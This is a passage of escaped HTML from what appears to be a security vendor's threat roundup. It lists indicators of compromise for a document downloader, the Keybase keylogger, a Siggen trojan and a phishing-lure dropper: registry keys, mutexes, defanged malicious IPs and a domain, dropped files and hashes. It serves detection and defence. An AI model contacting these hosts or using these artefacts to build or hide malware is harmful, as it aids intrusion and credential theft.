src="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-DJlz0AF129c/WTrYPGlFfxI/AAAAAAAABEA/TJrbbknZhz4nmD-PkZhb1bJY0MsqTqd_gCLcB/s1600/9a238c95de1ba5bc414aa0fd45297bf79f02b1de03d93a65ad74e91e37eb9ae9_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-DJlz0AF129c/WTrYPGlFfxI/AAAAAAAABEA/TJrbbknZhz4nmD-PkZhb1bJY0MsqTqd_gCLcB/s400/9a238c95de1ba5bc414aa0fd45297bf79f02b1de03d93a65ad74e91e37eb9ae9_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-hUgePS_jE3k/WTrYTlqEjxI/AAAAAAAABEE/Tb2-9t0i_YA3D4FfbqohtZjP97UKMDgcwCLcB/s1600/9a238c95de1ba5bc414aa0fd45297bf79f02b1de03d93a65ad74e91e37eb9ae9_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="471" data-original-width="1237" height="151" src="https://1.bp.blogspot.com/-hUgePS_jE3k/WTrYTlqEjxI/AAAAAAAABEE/Tb2-9t0i_YA3D4FfbqohtZjP97UKMDgcwCLcB/s400/9a238c95de1ba5bc414aa0fd45297bf79f02b1de03d93a65ad74e91e37eb9ae9_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Doc.Downloader.Generic-6327950-1&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyOverride&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyEnable&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00002109F100C0400000000000F01FEC\USAGE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;SpellingAndGrammarFiles_1036&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyBypass&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00002109F100A0C00000000000F01FEC\USAGE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;SpellingAndGrammarFiles_3082&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00002109F10090400000000000F01FEC\USAGE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;SpellingAndGrammarFiles_1033&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;AutoConfigURL&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\CRYPTOGRAPHY\RNG&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;Seed&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyServer&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\Shared Tools\Panose&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\RECENTDOCS\.docm&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;_!SHMSFTHISTORY!_&lt;/li&gt;&lt;li&gt;Local\ZonesCounterMutex&lt;/li&gt;&lt;li&gt;Local\c:!documents and settings!administrator!local settings!history!history.ie5!mshist012017052920170530!&lt;/li&gt;&lt;li&gt;CTF.Compart.MutexDefaultS-1-5-21-1202660629-583907252-1801674531-500&lt;/li&gt;&lt;li&gt;Local\MU_ACBPIDS09_S-1-5-5-0-35459&lt;/li&gt;&lt;li&gt;Local\!IETld!Mutex&lt;/li&gt;&lt;li&gt;Local\_!MSFTHISTORY!_&lt;/li&gt;&lt;li&gt;CTF.LBES.MutexDefaultS-1-5-21-1202660629-583907252-1801674531-500&lt;/li&gt;&lt;li&gt;Global\MTX_MSO_AdHoc1_S-1-5-21-1202660629-583907252-1801674531-500&lt;/li&gt;&lt;li&gt;Local\WininetProxyRegistryMutex&lt;/li&gt;&lt;li&gt;CTF.TimListCache.FMPDefaultS-1-5-21-1202660629-583907252-1801674531-500MUTEX.DefaultS-1-5-21-1202660629-583907252-1801674531-500&lt;/li&gt;&lt;li&gt;Local\WininetConnectionMutex&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;74[.]208[.]222[.]23&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;accotaxs[.]com&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\TEMP\~$e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb.docm&lt;/li&gt;&lt;li&gt;%System32%\config\WindowsPowerShell.evt&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temp\bbbababfcecbfa523.txt&lt;/li&gt;&lt;li&gt;\TEMP\27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb.docm&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temp\bbffdeafaccece.txt&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Desktop\d37e.exe&lt;/li&gt;&lt;li&gt;%SystemDrive%\~$runme.docx&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temp\12tedsgsas124.txt&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temp\tedsgsas124.txt&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temp\eccbfaffbbb.txt&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temp\bbbababfcecbfa.txt&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\MRMBYDAX\gate[1].htm&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb&lt;/li&gt;&lt;li&gt;078de2765221c2d5b5030bdd1d7adaa066dd4fc6a6575111df76ec7dd3785bfd&lt;/li&gt;&lt;li&gt;5239d220d79e36af270a89d0683f6744f2b823c18880aa7fe02bc004c52f78ec&lt;/li&gt;&lt;li&gt;ab2ffad0977dda99a85c12d97fa40a8c09d5b81d08f7323e9e70e408ef017f3b&lt;/li&gt;&lt;li&gt;c94d3f6f98fea91c7ff34920cbed45f800e6062706a7192ed6f354c96c669e4b&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-0roBbKbGlKc/WTrdDWKzCYI/AAAAAAAABE8/yvDB8YS-qb0ogKYDg64xvXM-E6MILJcOwCLcB/s1600/27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-0roBbKbGlKc/WTrdDWKzCYI/AAAAAAAABE8/yvDB8YS-qb0ogKYDg64xvXM-E6MILJcOwCLcB/s400/27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-H4JUbTdZAIU/WTrdJ7l9rpI/AAAAAAAABFA/-wVWvcDJggM-ev-azRbCWLGRcSCTy9ARgCLcB/s1600/27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1017" data-original-width="1237" height="328" src="https://4.bp.blogspot.com/-H4JUbTdZAIU/WTrdJ7l9rpI/AAAAAAAABFA/-wVWvcDJggM-ev-azRbCWLGRcSCTy9ARgCLcB/s400/27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/--gRngONMW98/WTrdQ0iAbQI/AAAAAAAABFE/_IjW98CcL0QaHjALVlYsMRYFk1eGQ6apwCLcB/s1600/27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="342" data-original-width="1112" height="122" src="https://2.bp.blogspot.com/--gRngONMW98/WTrdQ0iAbQI/AAAAAAAABFE/_IjW98CcL0QaHjALVlYsMRYFk1eGQ6apwCLcB/s400/27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Keybase-6328970-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;217[.]174[.]148[.]65&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%AppData%\Important.exe&lt;/li&gt;&lt;li&gt;%AppData%\Browsers.txt&lt;/li&gt;&lt;li&gt;%AppData%\Mails.txt&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;7d22f93bea6e24c11497a826e692216861bb5710e0e6a9842ed9c30463a11b24&lt;/li&gt;&lt;li&gt;8b1c64f993778c52906b8170cc6c16a07f4116e23661956a738323aca7b12c3a&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-blOMf7jFl3Y/WTrZ0kJB_xI/AAAAAAAABEU/1SfQORHFrt8Bu5hjzu3xliTfsbOiLYcqQCLcB/s1600/7d22f93bea6e24c11497a826e692216861bb5710e0e6a9842ed9c30463a11b24_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-blOMf7jFl3Y/WTrZ0kJB_xI/AAAAAAAABEU/1SfQORHFrt8Bu5hjzu3xliTfsbOiLYcqQCLcB/s400/7d22f93bea6e24c11497a826e692216861bb5710e0e6a9842ed9c30463a11b24_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-8nKYKzymnIk/WTrZ-AKkuSI/AAAAAAAABEY/Sy0WwRVXimQkgKHK3K1pjsupFXHJi6NgQCLcB/s1600/7d22f93bea6e24c11497a826e692216861bb5710e0e6a9842ed9c30463a11b24_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="810" data-original-width="1212" height="266" src="https://1.bp.blogspot.com/-8nKYKzymnIk/WTrZ-AKkuSI/AAAAAAAABEY/Sy0WwRVXimQkgKHK3K1pjsupFXHJi6NgQCLcB/s400/7d22f93bea6e24c11497a826e692216861bb5710e0e6a9842ed9c30463a11b24_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-jlVW741pWo4/WTraD01HVLI/AAAAAAAABEc/wQVJGZ7cGRUyS5r4opcYfJz-5cR71iXhwCLcB/s1600/217.174.148.65_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="600" data-original-width="1092" height="218" src="https://1.bp.blogspot.com/-jlVW741pWo4/WTraD01HVLI/AAAAAAAABEc/wQVJGZ7cGRUyS5r4opcYfJz-5cR71iXhwCLcB/s400/217.174.148.65_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Siggen-6261194-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;Collection&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Local\MSCTF.Asm.MutexDefault1&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;52[.]173[.]193[.]166&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nsrD.tmp&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;76cac7eac498813164dcb94ed0812163bc4d261ef80232ec528aa941e0622479&lt;/li&gt;&lt;li&gt;2dd6b33d9e07c68b79b6674e0972f28ee316548c5e53b28331d88c739d1a5b8f&lt;/li&gt;&lt;li&gt;87701e501b48b94e9494bbda3f42a8b2a92a0e19d51d3e6023efae30b86f74a0&lt;/li&gt;&lt;li&gt;4a1b26fd16f985e1da3f1b5619b55f6170584ac51923bd6d6c4c455fc86d44da&lt;/li&gt;&lt;li&gt;f20ef69203c8bd06da68071ccf38001fcd411de5c951bb38bb46a15e6d205458&lt;/li&gt;&lt;li&gt;74a306f136aa3b098fe99f6e35a1163d808c996e7ca6f8cd03fc69ec0a2573c0&lt;/li&gt;&lt;li&gt;8998b35cd76f170e62275661c0f0256883ec2b8e34b9e5ff9530c9da4d07fb74&lt;/li&gt;&lt;li&gt;dd249e28e052a2e7747886a0596e7faf7e447fbef7260198509fc6e08c294bbb&lt;/li&gt;&lt;li&gt;745d8d433cba5315749dc61810d9bf4eb1864fb9737c4a2fc3718eda75917d6f&lt;/li&gt;&lt;li&gt;5527923be2a750415d9565fcfc38550bf292206cee0e415278e8e08d3f3cdbdc&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-TaoaIfZ3SBU/WTrbx6GHJ_I/AAAAAAAABEs/GKP6EVO5DdAdiKG-ipbkndtiU1XEjoeaACLcB/s1600/Win_Trojan_Siggen_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="422" data-original-width="608" height="277" src="https://4.bp.blogspot.com/-TaoaIfZ3SBU/WTrbx6GHJ_I/AAAAAAAABEs/GKP6EVO5DdAdiKG-ipbkndtiU1XEjoeaACLcB/s400/Win_Trojan_Siggen_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-szw1jtJ8-4Q/WTrb1zASzyI/AAAAAAAABEw/Rwz1mS4kmfI_NigHnESb632kARFlwKSIQCLcB/s1600/Win_Trojan_Siggen_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="418" data-original-width="1600" height="83" src="https://1.bp.blogspot.com/-szw1jtJ8-4Q/WTrb1zASzyI/AAAAAAAABEw/Rwz1mS4kmfI_NigHnESb632kARFlwKSIQCLcB/s320/Win_Trojan_Siggen_tg.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Image.Dropper.PhishingLure&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.MSO\E6B7EA3D.emf&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\654500.cvr&lt;/li&gt;&lt;li&gt;%TEMP%\CVRFECE.tmp.cvr&lt;/li&gt;&lt;li&gt;\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31ADA98B.emf&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;71c534db25e2c523ed71b7ec30289f8c91a15d8f61a7c132a8f0958086d9cf67&lt;/li&gt;&lt;li&gt;b59051ead1c391fc3f5d4df44408606a6a0662456edf3a360760bc1df28e85b0&lt;/li&gt;&lt;li&gt;46e918a71e35421fd6384e4faa044758f636709aad1cdc28def585902560e75c&lt;/li&gt;&lt;li&gt;3fd12be1754315caaa508cb1dd3ed3c42d5ccfb9281a3c299b914da993919372&lt;/li&gt;&lt;li&gt;7d89276ddbb3e7d0a0c7628fbab04aace04e52f885b7b0619191b47eef4b3427&lt;/li&gt;&lt;li&gt;2190bab38a01b157023f4000b22958db934eb89fe2868593bcb3a28daca13cdb&lt;/li&gt;&lt;li&gt;884bdf459f5b218c56070cfba568a166e0f58df5e91373853b73a1eaf5c96896&lt;/li&gt;&lt;li&gt;55cae108a1f375d112831c24df0f9d0300028fb46e1ab4b7ff9c477da29888cf&lt;/li&gt;&lt;li&gt;069ea4075dfd279be50ee1a2904b6a5f024f7e924c91f5249e2047f93c971255&lt;/li&gt;&lt;li&gt;c47359bd7ab8c463522a7e3356ed6de278cfa8ebe0afe9d5e8fcb359c356eb9f&lt;/li&gt;&lt;li&gt;8752350c7df238d3bc210f13edc74486c4c5e62ee935cc32fce6d84ba2fe3664&lt;/li&gt;&lt;li&gt;c74a3428c963a4b8ecc86279e609b7e687d635068a7c607686c3b1228715affe&lt;/li&gt;&lt;li&gt;264bd038374d6dec2419788a189bc22253e944ae78e69082370700cfe163a5f6&lt;/li&gt;&lt;li&gt;c9c4a76991fa7dabe4c5e242eceefb2276470ab16933576b8834a72db99bdb8a&lt;/li&gt;&lt;li&gt;ba1e7358f4ac42e0e6d575e0f39c7a07939e31b03f82382486200b3d877fbe95&lt;/li&gt;&lt;li&gt;2aaeb1e014c6940fb9f1ed979622daec2bcb0afd27a431b60d575429513c4747&lt;/li&gt;&lt;li&gt;8fba7699a4f56f2ff0ef88137e7d9a045a8d58aeb2ee7764c70a57fd5e75c7b2&lt;/li&gt;&lt;li&gt;6c2e949f0e7ef6beb164e164636abfdb052386cc29318b4f80193ca1bb847e36&lt;/li&gt;&lt;li&gt;0fecda1f3e3c6bfc840119d3ec7788108b3bd2555cec500f9737499b57b20361&lt;/li&gt;&lt;li&gt;e7b20cb956fb4bfbfbaaeae08265a3986114dd84fec72e6dbbda5ff8f0f9d602&lt;/li&gt;&lt;li&gt;63933469402c62a974f9e8c4d3563a1b8343cb5ae4962bbf8185cbcdf22f9855&lt;/li&gt;&lt;li&gt;5d146dc96acac7a6026b0a82d611c18c58852c328ea55d27737b2fbb0265fc3d&lt;/li&gt;&lt;li&gt;54071e124b61d87336c49408a420b98046828cceba18868e2fde9170a287843a&lt;/li&gt;&lt;li&gt;e28775913fc2f714c665bc96babe101f509399754503dcfac1cff6614f0b5e04&lt;/li&gt;&lt;li&gt;2e76194f7889f84004a11d69af8df7a08c8602555a6f8629f146a593eb4bb732&lt;/li&gt;&lt;li&gt;d15b79df9e9a6b9d09b984b1992f8433db9734e8fbe1036aecd05c941dfc6b12&lt;/li&gt;&lt;li&gt;0dc28f0d53d35417a7527ec8f248487ec270992bbfd0e1837a56fcda6fe9af1a&lt;/li&gt;&lt;li&gt;fc66061242ba1d9cf3255437b6c8d0d8a0e6fdba3e63d9a611205b8654f11246&lt;/li&gt;&lt;li&gt;05264cd26e8d9c16ff1f5a71ee5641be5113ee247270072ac1e0173ee5688849&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-RE98hgPe9Hw/WOf00kgNpzI/AAAAAAAAAy8/v2n5vvA9kGgNBMZsy9b3eJQCwsCW2hA5QCLcB/s400/amp-threatgrid-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-RE98hgPe9Hw/WOf00kgNpzI/AAAAAAAAAy8/v2n5vvA9kGgNBMZsy9b3eJQCwsCW2hA5QCLcB/s400/amp-threatgrid-only.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 